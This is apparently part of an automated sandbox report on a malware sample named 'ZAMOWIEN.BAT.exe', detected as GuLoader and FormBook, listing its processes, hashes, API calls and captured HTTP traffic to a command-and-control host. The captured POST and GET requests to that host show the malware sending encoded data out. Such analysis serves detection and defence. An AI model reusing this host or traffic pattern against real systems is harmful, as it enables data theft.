f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49856	172.67.145.234	80	3448	C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 07:10:49.529058933 CET	10813	OUT	POST /4twy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Host: www.vayui.top Origin: http://www.vayui.top Referer: http://www.vayui.top/4twy/ Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 10304 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0 Data Raw: 57 50 6a 78 32 30 4d 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 6a 73 62 38 64 50 44 6d 30 57 4f 37 2b 63 43 57 4c 76 57 49 78 43 66 49 6e 67 6a 68 68 73 50 48 6b 34 4b 50 6d 6d 77 33 52 34 73 55 4f 43 39 6d 59 69 7a 68 79 72 61 6d 48 36 2f 77 58 41 6f 4c 50 36 47 2f 49 62 37 43 54 64 49 2f 6e 53 79 72 45 79 34 6b 62 34 41 71 31 51 37 44 2f 45 79 53 37 39 57 63 6b 62 54 36 51 32 49 33 75 66 4a 43 4a 43 61 2f 39 59 64 2f 68 75 49 6f 47 62 49 57 35 37 62 6e 6e 34 6b 77 67 74 4f 2f 75 53 63 31 73 31 6f 30 55 48 64 73 6e 77 61 41 55 76 4e 32 76 44 32 35 55 47 4e 77 36 6a 4f 63 56 4f 61 46 53 34 52 72 6b 7a 4c 67 54 6e 6e 44 57 33 72 68 77 59 49 65 34 62 54 4b 47 6e 45 67 5a 55 50 48 51 2b 66 34 4a 45 6a 50 57 56 34 6e 6f 62 69 49 6d 44 53 4a 74 49 58 73 6b 56 49 44 33 56 38 72 4b 4d 61 6d 4d 71 73 37 61 47 41 36 37 76 62 55 67 44 74 49 75 4b 42 30 65 76 6d 69 6b 32 38 37 66 4b 70 57 61 68 6f 50 73 46 63 39 6b 61 31 6e 6d 55 6d 4e 6f 39 4d 33 2b 2f 2b 7a 6d 63 62 33 30 47 33 73 45 39 65 59 78 56 33 59 4b 65 [TRUNCATED] Data Ascii: WPjx20M=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhhsPHk4KPmmw3R4sUOC9mYizhyramH6/wXAoLP6G/Ib7CTdI/nSyrEy4kb4Aq1Q7D/EyS79WckbT6Q2I3ufJCJCa/9Yd/huIoGbIW57bnn4kwgtO/uSc1s1o0UHdsnwaAUvN2vD25UGNw6jOcVOaFS4RrkzLgTnnDW3rhwYIe4bTKGnEgZUPHQ+f4JEjPWV4nobiImDSJtIXskVID3V8rKMamMqs7aGA67vbUgDtIuKB0evmik287fKpWahoPsFc9ka1nmUmNo9M3+/+zmcb30G3sE9eYxV3YKeiOaB5iTXlyuoo6YA9ztImsejoQCb/ulwnEBBzgMWu6ZQR6bDuTqBYdZlU7FwBe9SjF9DYaOc/36NgECFaWkhEHaDDjR8Gkov0VqdcQbIlRDD53Mm/PdR0sGmVgHVtXaY8SGELUUd0nyzRKQ0VP71RFb6Ymei4cJ8Rx5lZJaWC6pwOz3FHQGQKSXUAR/SBL+09I0ERyS5zBZ3p/LMDDxshbasfQxBobhc4aqiUXTz+L5qJjjg/cSW7KKKM63p9mgsnx6AE411pbBff0FEV6BmyZqe/MaYm4dMSexPo/diL/pn/YKJmcASZ1/9OnFFhDE9v50IlIBXDPnF13+1ZgUiWgXZ7qpV+T6RO+QgNuwuz6M1LiWQWDCmvQTbRpAw1Fv3FbU9jsI8pevETjMQe1w1brzS60m0SRT98soNyl7EOSHCGbbg4b3UjkpeOecCknu8ZfcOVgqpZTUQv/DR2C71cNm0tFBitRBKLJ1qChgkcUrs03b3viycPJqlLWnSW7BAZMWa64YNGsp4g5StgCZfyXYNpjC9E4nVzQE8wxiVlAueNeo0tdx/gmYSLRu/y/8Rgl/FQCkZKK3vovXH+CcsC54tBbJBcKegNIjy3pbpuW4RjstGPwzKKpv5Tw6Kg84x97TNZ7Ye1hJMjf/Bjee2zN1GJqQJrFBoSo [TRUNCATED]
Dec 2, 2024 07:10:50.709623098 CET	909	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 06:10:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Amd3muBhw0lr9yOsgIVTXOd6piF8IyWGGgVEoLmlLM5KfSLUidfU2x%2FqlRRk7%2BhyS81Zdb54wpulQSueONeSOFQMCnRQ2a6ZiA80maXAnQtN8eE%2F9B9xUM0sdOP2QMUB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb927f8ed518c42-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=7&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10813&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49865	172.67.145.234	80	3448	C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 07:10:52.202168941 CET	460	OUT	GET /4twy/?WPjx20M=mBCElVLkK93E7Nf+SfzPyEy2pe/+ELSSyRrruRXkg+zqtIWho1c/UIFICRtgbVPxo7eZFunASSkRDpjuJtL+SqF6mTOIbDVEeaMEgz/yh1+O2PfmmYS3a3E=&bxJPx=a6h4-FrPGbkpc HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.vayui.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Dec 2, 2024 07:10:53.419974089 CET	919	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 06:10:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ptIhjyLo636hqVzj9NRO5lXvHSLk1Gz1HFNam%2BQiz8zfRogeGEXpgyXO2LRPWVQQ8h06MfE9wCqhm4yerlS%2BEEBo2PHiY1ilEFxIeL1%2BbOY28lnJaRBAtcnB5RnqAeR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb92809fbed42da-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Target ID:	0
Start time:	01:08:53
Start date:	02/12/2024
Path:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
Imagebase:	0x400000
File size:	751'345 bytes
MD5 hash:	2DBE82E3BC304A5B59B1B7C080464F60
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2063039037.0000000004F1D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:09:34
Start date:	02/12/2024
Path:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
Imagebase:	0x400000
File size:	751'345 bytes
MD5 hash:	2DBE82E3BC304A5B59B1B7C080464F60
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:10:03
Start date:	02/12/2024
Path:	C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe"
Imagebase:	0xe00000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:10:05
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\sdchange.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\sdchange.exe"
Imagebase:	0x300000
File size:	40'960 bytes
MD5 hash:	8E93B557363D8400A8B9F2D70AEB222B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	01:10:19
Start date:	02/12/2024
Path:	C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe"
Imagebase:	0xe00000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:10:31
Start date:	02/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	27.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.5%
Total number of Nodes:	723
Total number of Limit Nodes:	19

Executed Functions

Function 0040364B Relevance: 88.0, APIs: 32, Strings: 18, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040366E
GetVersionExW.KERNEL32(?), ref: 00403699
GetVersionExW.KERNEL32(?), ref: 004036AC
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403745
#17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403782
OleInitialize.OLE32(00000000), ref: 00403789
SHGetFileInfoW.SHELL32(0079F748,00000000,?,000002B4,00000000), ref: 004037A8
GetCommandLineW.KERNEL32(007A72A0,NSIS Error,?,00000008,0000000A,0000000C), ref: 004037BD
CharNextW.USER32(00000000,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000020,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,0000000C,?,00000008,0000000A,0000000C), ref: 0040392E
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 0040393F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040394B
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040395F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 00403967
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 00403978
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403980
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403994
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,0000000A), ref: 00403A6D

Part of subcall function 00406688: lstrcpynW.KERNEL32(?,?,00000400,004037BD,007A72A0,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406695

wsprintfW.USER32 ref: 00403ACA
GetFileAttributesW.KERNEL32(user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),C:\Users\user\AppData\Local\Temp\,user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),?), ref: 00403AFD
DeleteFileW.KERNEL32(user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0)), ref: 00403B09
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),?), ref: 00403B37

Part of subcall function 00406448: MoveFileExW.KERNEL32(?,?,00000005,00405F46,?,00000000,000000F1,?,?,?,?,?), ref: 00406452

CopyFileW.KERNEL32(C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B4D

Part of subcall function 00405C6B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4790,?), ref: 00405C94
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405CA1

Part of subcall function 004069E5: FindFirstFileW.KERNELBASE(?,007A47D8,007A3F90,004060A8,007A3F90,007A3F90,00000000,007A3F90,007A3F90,?,?,74DF2EE0,00405DB4,?,74DF3420,74DF2EE0), ref: 004069F0
Part of subcall function 004069E5: FindClose.KERNELBASE(00000000), ref: 004069FC

OleUninitialize.OLE32(0000000A,?,00000008,0000000A,0000000C), ref: 00403B9B
ExitProcess.KERNEL32 ref: 00403BB8
CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),00000000), ref: 00403BBF
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403BDB
OpenProcessToken.ADVAPI32(00000000), ref: 00403BE2
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C1A
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C3F
ExitProcess.KERNEL32 ref: 00403C62

Part of subcall function 00405C36: CreateDirectoryW.KERNELBASE(?,00000000,0040363E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00405C3C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman, xrefs: 00403A40
1033, xrefs: 0040398F
TEMP, xrefs: 00403973
\Temp, xrefs: 00403945
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne, xrefs: 00403913, 00403A35, 00403A82, 00403A90
UXTHEME, xrefs: 00403739, 0040373E, 00403744
C:\Users\user\Desktop\ZAMOWIEN.BAT.exe, xrefs: 00403B48
Low, xrefs: 00403961
NSIS Error, xrefs: 004037AE
C:\Users\user\AppData\Local\Temp\, xrefs: 00403923, 00403928, 0040393E, 0040394A, 00403959, 00403966, 00403972, 0040397A, 00403A68, 00403AE9, 00403B15, 00403B36, 00403B3F
TMP, xrefs: 0040397B
user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0), xrefs: 00403AAD, 00403ADE, 00403AFC, 00403B08, 00403B47, 00403B59, 00403B86
Error launching installer, xrefs: 00403A16
SeShutdownPrivilege, xrefs: 00403BF1
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403662
"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe", xrefs: 004037C3, 004037C9, 004037DE, 004039BC
~nsu%X.tmp, xrefs: 00403AC1
C:\Users\user\Desktop, xrefs: 00403A8B

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.BAT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0)$~nsu%X.tmp
API String ID: 1813718867-1806501031
Opcode ID: 5e869b6033df73d8b981345796dca4d64198429db802d17ca4a2d8584e9ad5f3
Instruction ID: 50a7466d29c98c80bfe2a23c7dffe003fc6d82c470fa972a1c6e6f6136cde8fe
Opcode Fuzzy Hash: 5e869b6033df73d8b981345796dca4d64198429db802d17ca4a2d8584e9ad5f3
Instruction Fuzzy Hash: 61F1F6716043009AD720AF658D05B2B7EE8EF8570AF10883EF581B62D2DB7DC941CB6E

Function 6E351BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E3512BB: GlobalAlloc.KERNEL32(00000040,?,6E3512DB,?,6E35137F,00000019,6E3511CA,-000000A0), ref: 6E3512C5

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6E351D2D
lstrcpyW.KERNEL32(00000008,?), ref: 6E351D75
lstrcpyW.KERNEL32(00000808,?), ref: 6E351D7F
GlobalFree.KERNEL32(00000000), ref: 6E351D92
GlobalFree.KERNEL32(?), ref: 6E351E74
GlobalFree.KERNEL32(?), ref: 6E351E79
GlobalFree.KERNEL32(?), ref: 6E351E7E
GlobalFree.KERNEL32(00000000), ref: 6E352068
lstrcpyW.KERNEL32(?,?), ref: 6E352222
GetModuleHandleW.KERNEL32(00000008), ref: 6E3522A1
LoadLibraryW.KERNEL32(00000008), ref: 6E3522B2
GetProcAddress.KERNEL32(?,?), ref: 6E35230C
lstrlenW.KERNEL32(00000808), ref: 6E352326

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 7772dec5edd1187d9cc74264ebd98af0a57346dfcf6f85d0ff274d34bdcfc0cd
Instruction ID: 39bb73917721c7530225412f22e3bfa48316a462ed43cca2eb19ae6e2ed236d5
Opcode Fuzzy Hash: 7772dec5edd1187d9cc74264ebd98af0a57346dfcf6f85d0ff274d34bdcfc0cd
Instruction Fuzzy Hash: B1229D71D14A06DEDB508FE9C980AEEB7F8FF06305F20452AD1A5E3340D7759AA9CB60

Function 00405D94 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405DBD
lstrcatW.KERNEL32(007A3790,\*.*,007A3790,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405E05
lstrcatW.KERNEL32(?,0040A014,?,007A3790,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405E28
lstrlenW.KERNEL32(?,?,0040A014,?,007A3790,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405E2E
FindFirstFileW.KERNEL32(007A3790,?,?,?,0040A014,?,007A3790,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405E3E
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405EDE
FindClose.KERNEL32(00000000), ref: 00405EED

Strings

"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe", xrefs: 00405D9D
\*.*, xrefs: 00405DFF

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$\*.*
API String ID: 2035342205-3095958033
Opcode ID: 79059cff9eb4437ead2685de5f4d5bd646c9fcc710622952c42b7afc5d0a73d3
Instruction ID: c3d9b996b258623d8c76b1d58464cf99715ac6bed412b32e5c1faccd0a0ddcc3
Opcode Fuzzy Hash: 79059cff9eb4437ead2685de5f4d5bd646c9fcc710622952c42b7afc5d0a73d3
Instruction Fuzzy Hash: D341C530800A14A6CB21AB65CD89AAF7778EF81758F20413FF545711D1DB7C4A82DEAE

Function 004069E5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A47D8,007A3F90,004060A8,007A3F90,007A3F90,00000000,007A3F90,007A3F90,?,?,74DF2EE0,00405DB4,?,74DF3420,74DF2EE0), ref: 004069F0
FindClose.KERNELBASE(00000000), ref: 004069FC

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
